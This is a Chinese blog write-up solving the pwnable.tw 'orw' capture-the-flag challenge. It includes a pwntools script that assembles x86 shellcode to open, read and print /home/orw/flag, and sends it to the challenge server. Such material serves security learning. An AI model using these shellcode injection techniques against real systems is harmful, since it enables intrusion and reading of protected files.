pwnable.tw - orw

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/tan6600/article/details/80967853

简单概览

image_1chkkmh6m17j9j0c85t1l11ustp.png-22.3kB
与 start 不同,该程序使用动态链接

提示仅允许有限的系统调用 open read write 函数

程序运行

image_1chl27d7lfgvl8siov1m5r17bi16.png-8.9kB
哪怕是输入一个字母,程序仍然会出现段错误

检查安全措施

image_1chl2bs2s1f1g106g1csk1h872mn1j.png-14kB
可见栈上开了 CANARY

程序

在 IDA 中反编译可见:
image_1chl3sf5r19ck7eu1dnh1k1i16ht19.png-9.6kB
函数 orw_seccomp 反编译:
image_1chl5lhcibrr3p1cj51ada1mkd1m.png-16.9kB

程序从终端读入内容,存放在 shellcode,然后执行该命令

所以大体过程为先 open 文件,然后 read 读出内容,再 write 打印到终端

from pwn import *
open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"
read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"
write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"
shellcode = open_shellcode + read_shellcode + write_shellcode
payload = asm(shellcode)
io = remote("chall.pwnable.tw", 10001)
io.recvuntil("shellcode:")
io.sendline(payload)
print io.recv()
io.interactive()

/home/orw/flag 转换为 16 进制为 2f686f6d652f6f72772f666c6167,即压栈数据,还要补零

执行就可以得到 flag

阅读更多
想对作者说点什么?

博主推荐

换一批

没有更多推荐了,返回首页